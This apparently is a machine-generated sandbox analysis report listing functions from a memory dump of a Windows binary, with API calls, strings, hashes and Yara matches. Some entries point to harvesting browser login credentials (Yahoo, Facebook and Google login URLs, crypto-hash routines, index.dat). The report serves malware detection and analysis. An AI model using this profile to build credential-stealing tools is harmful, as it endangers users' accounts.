                                                  • Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                  • Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411EF8, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 00411F05
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00411F16
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00411F26
                                                  • LockResource.KERNEL32(00000000), ref: 00411F31
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                  • Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
                                                  • Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                  • Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00442D7A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 44d13ece2455e6bf70e94478653814ebefdf6deeb09379604d67fc2da5a05fd3
                                                  • Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
                                                  • Opcode Fuzzy Hash: 44d13ece2455e6bf70e94478653814ebefdf6deeb09379604d67fc2da5a05fd3
                                                  • Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0043800C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  • API String ID: 2221118986-1725073988
                                                  • Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                  • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                  • Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                  • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409F53, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                  • Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
                                                  • Opcode Fuzzy Hash: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                  • Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041C702, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 5lA$BINARY
                                                  • API String ID: 2221118986-2383938406
                                                  • Opcode ID: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                  • Instruction ID: bfb3245fc00688105b1f81726e77846e409aff0e69a2cb21cfce066b793b8303
                                                  • Opcode Fuzzy Hash: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                  • Instruction Fuzzy Hash: 52519C719443459FDB21DF68C8C1AEA7BE4AF08351F14446FE859CB381D778D980CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414E1C, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00414D9F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                    • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD1
                                                    • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD7
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00414E4C
                                                  • GetLastError.KERNEL32 ref: 00414E56
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  • Opcode ID: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                  • Instruction ID: 78f6fc62e556ae6391f2b7d02d7635eeebb8002b3cc976368f6d55ef40470767
                                                  • Opcode Fuzzy Hash: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                  • Instruction Fuzzy Hash: 20016D36244305BBEB108F65EC45BEB7B6CFB95761F100427F908D6240E774ED908AE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414D9F, Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                  • GetLastError.KERNEL32 ref: 00414DD1
                                                  • GetLastError.KERNEL32 ref: 00414DD7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  • Opcode ID: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                  • Instruction ID: ce6d17c8e1bf95b997c08e1a60c9ed70337bd99ba9d8843779863386e1f48c80
                                                  • Opcode Fuzzy Hash: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                  • Instruction Fuzzy Hash: 16F03936A10119BBCF009F74EC019EA7BA8EB45760B104726E822E6690EB30EA409AD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407475, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • malloc.MSVCRT ref: 00407491
                                                  • memcpy.MSVCRT ref: 004074A9
                                                  • free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: freemallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3056473165-0
                                                  • Opcode ID: cfd8dded6270ab76b115604b577ea4a7b41de6cad30d2a4b436932789bdeb74f
                                                  • Instruction ID: e360d5709d2f3202c1ca25caae3d4aa805c65bf3858a1f44a91d23c9b12a71fe
                                                  • Opcode Fuzzy Hash: cfd8dded6270ab76b115604b577ea4a7b41de6cad30d2a4b436932789bdeb74f
                                                  • Instruction Fuzzy Hash: FFF0E972A082229FD708EB75A94180B779DAF44364710442FF404E3281D738AC40C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0044233C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040FF66,?,?,00403292,?), ref: 0044234D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: Lh@
                                                  • API String ID: 3664257935-1564020105
                                                  • Opcode ID: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                  • Instruction ID: 76fd25b73cfe59c43d76c33e9e0e0ec1b0c89da13299cefcee144e01fa2b623b
                                                  • Opcode Fuzzy Hash: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                  • Instruction Fuzzy Hash: 33E0F6B5900B008F93308F2BE944407FBF9BFE56113108E1FE4AAC2A24C3B4A6458F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004349F1, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: ce38069431d75cbd9469390c6fd040c4a17fe8be27d7aae76b779c9a917add19
                                                  • Instruction ID: 01fd0a19dca965820be780cd5e1a180e940d32085fcd4292c33d665daa4a4ca3
                                                  • Opcode Fuzzy Hash: ce38069431d75cbd9469390c6fd040c4a17fe8be27d7aae76b779c9a917add19
                                                  • Instruction Fuzzy Hash: B7819D716083519FCB10EF1AC84169FBBE0AFC8318F15592FF88497251D778EA85CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C5B3, Relevance: 3.1, APIs: 2, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                    • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040C5DC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000), ref: 0040C6E9
                                                    • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                    • Part of subcall function 004071BD: GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                    • Part of subcall function 004071BD: _snwprintf.MSVCRT ref: 004071FE
                                                    • Part of subcall function 004071BD: MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  • Opcode ID: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                  • Instruction ID: 8008e0f7e2c68a0a7dbf7afa260ddf7c08443fea941bd9d01fd0dc6d198c04cd
                                                  • Opcode Fuzzy Hash: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                  • Instruction Fuzzy Hash: 82415F31B00100EBCB359F69C8C9E5E76A5AF45710F215A2BF406A73D1CB7AAD80CA5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E227, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  • Opcode ID: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                  • Instruction ID: 5da650caeba3f583edd317abe6dc9e2273d49bc4fc560570e2d9775ed52fc578
                                                  • Opcode Fuzzy Hash: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                  • Instruction Fuzzy Hash: 37218170B00105AFD704FFAA89C1A9DB7A9BF94304F1045BEE415F7382DB79AD218B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040946C, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$FileFindFirst
                                                  • String ID: index.dat
                                                  • API String ID: 1858513025-427268347
                                                  • Opcode ID: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                  • Instruction ID: ea6e303a67c95597c7ba2300e155a691c3aaaa96276431a044c3ae834a976286
                                                  • Opcode Fuzzy Hash: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                  • Instruction Fuzzy Hash: 8601527180526999EB20E662CD426DE727CAF00314F1041BBA858F21D2EB3CDF868F4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412B2E, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 00412B57
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  • Opcode ID: f24fcd6304b93913b14247a0557fa27672ef6dd59737270ab95038e43013476f
                                                  • Instruction ID: 83e647f58a001b4b33716092e1dc9084e7a57e1649cb419fd0ecfe0012ae2b1c
                                                  • Opcode Fuzzy Hash: f24fcd6304b93913b14247a0557fa27672ef6dd59737270ab95038e43013476f
                                                  • Instruction Fuzzy Hash: B1E026B7F4561267C2004F1AEC019866790AFC032171A063BF92CD7380D678E9A683A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414DE6, Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 00414DFF
                                                  • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045162C,00415453,00000008,00000000,00000000,?,00415610,?,00000000), ref: 00414E08
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID:
                                                  • API String ID: 1821831730-0
                                                  • Opcode ID: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                  • Instruction ID: a5fc701692feba82469beb2995ebf65a4cce15204005db1f3291e32cb0673270
                                                  • Opcode Fuzzy Hash: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                  • Instruction Fuzzy Hash: 95E0CD372006155FD7005B7CDCC09D77399AF85734725032AF261C3190C665D4424664
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041946A, Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcmpmemset
                                                  • String ID:
                                                  • API String ID: 1065087418-0
                                                  • Opcode ID: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                  • Instruction ID: 09c6ddd7a7fbafff04f5e46546a8ec227a467f18660dcb1fea67ae87f7adc2a4
                                                  • Opcode Fuzzy Hash: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                  • Instruction Fuzzy Hash: EB6170B1E05205FFDB11EFA489A09EEB7B8AB04308F14806FE108E3241D7789ED5DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004098C2, Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                  • wcslen.MSVCRT ref: 00409901
                                                  • memset.MSVCRT ref: 00409980
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                  • String ID:
                                                  • API String ID: 1960736289-0
                                                  • Opcode ID: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                  • Instruction ID: eeeebaecff14eb5a2c3d0f3031068d4b6d2ebef8e1bb4496a3092dc18c5c1f6a
                                                  • Opcode Fuzzy Hash: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                  • Instruction Fuzzy Hash: C0318172510249BBCF11EFA5CCC19EE77B9AF48304F14887EF505B7282D638AE499B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ED6C, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040EDFA: memset.MSVCRT ref: 0040EE42
                                                    • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE59
                                                    • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE61
                                                    • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EEBC
                                                    • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EECA
                                                    • Part of subcall function 0040797A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040EDAE,00000000,?,00000000,?,00000000), ref: 00407992
                                                    • Part of subcall function 0040797A: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004079A6
                                                    • Part of subcall function 0040797A: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004101ED), ref: 004079AF
                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040EDB8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                  • String ID:
                                                  • API String ID: 4204647287-0
                                                  • Opcode ID: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                  • Instruction ID: 7375e5b5c48a3cf746583bdb812c6cb833081a8f043ffb24ec2f547d3e817a13
                                                  • Opcode Fuzzy Hash: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                  • Instruction Fuzzy Hash: 58114C72C00219ABCF11EBA5D9419DEBBB9EF44300F20047BE801F3280D634AF44CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411B36, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00411B5D
                                                    • Part of subcall function 004119C6: memset.MSVCRT ref: 004119E5
                                                    • Part of subcall function 004119C6: _itow.MSVCRT ref: 004119FC
                                                    • Part of subcall function 004119C6: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00411A0B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                  • String ID:
                                                  • API String ID: 4232544981-0
                                                  • Opcode ID: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                  • Instruction ID: e4974885a9e011c02de9f8347c72c3dce1736aa6ad634daf2893e710d343c839
                                                  • Opcode Fuzzy Hash: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                  • Instruction Fuzzy Hash: ABE0B672000149AFDF125F80EC01AA97BA6FF04315F248459FA5805631D73695B0EB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411376, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041139E: LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                    • Part of subcall function 0041139E: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                    • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                    • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                    • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                    • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0041126B,00000104,0041126B,00000000,?), ref: 00411395
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$FileLibraryLoadModuleName
                                                  • String ID:
                                                  • API String ID: 3821362017-0
                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction ID: 161ab63227dca0468342f2fd6fc01eeb5e2c53d4d8b5c6eb41d2cf02796b8335
                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction Fuzzy Hash: B3D0A9312183196BE220AB708C00FABA3E86B40710F008C2ABAA0D68A8D264C8805354
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407BB2, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040C605,00000000,00448B84,00000002,?,?,?,0040E2DC,00000000), ref: 00407BC9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                  • Instruction ID: 7a92458e03063ade3ff171a8f73d1b131da45bdd434acd56d38c8090c64c1cda
                                                  • Opcode Fuzzy Hash: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                  • Instruction Fuzzy Hash: 47D0C93511020DFBDF01CF80DC06FDD7B7DEB04759F108054BA1495060D7B59B14AB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407144, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                  • Instruction ID: 81d2dec17d2b84b4128be66cdd24e97b0dbf61b8fa3bcd6fd5fd384be9d73f32
                                                  • Opcode Fuzzy Hash: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                  • Instruction Fuzzy Hash: E4C092B0240201BEFF228B10ED16F36695CD740B01F2044247E00E40E0D1A04F108924
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040715D, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                  • Instruction ID: 6739adb68e03e12f7f7c1d8ccdc83ffe2e18cb8bef7d19e3acfe4a72d1b5eace
                                                  • Opcode Fuzzy Hash: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                  • Instruction Fuzzy Hash: 49C092F02502017EFF208B10AD0AF37695DD780B01F2084207E00E40E0D2A14C008924
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408604, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 7a03e879792b5fe31c33d7af5755a579040ef1194e7f819d695dad1928dde993
                                                  • Instruction ID: b86fd1081c12c971c14e25096d529e9df9055785cb1c99d48f6af2a57df14557
                                                  • Opcode Fuzzy Hash: 7a03e879792b5fe31c33d7af5755a579040ef1194e7f819d695dad1928dde993
                                                  • Instruction Fuzzy Hash: D3C09BB15127015BFB345E15D50571273E45F50727F354C1DB4D1D24C2DB7CD4408518
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004084DA, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindClose.KERNELBASE(?,004083EE,?,00000000,00000000,?,00410708,?), ref: 004084E4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
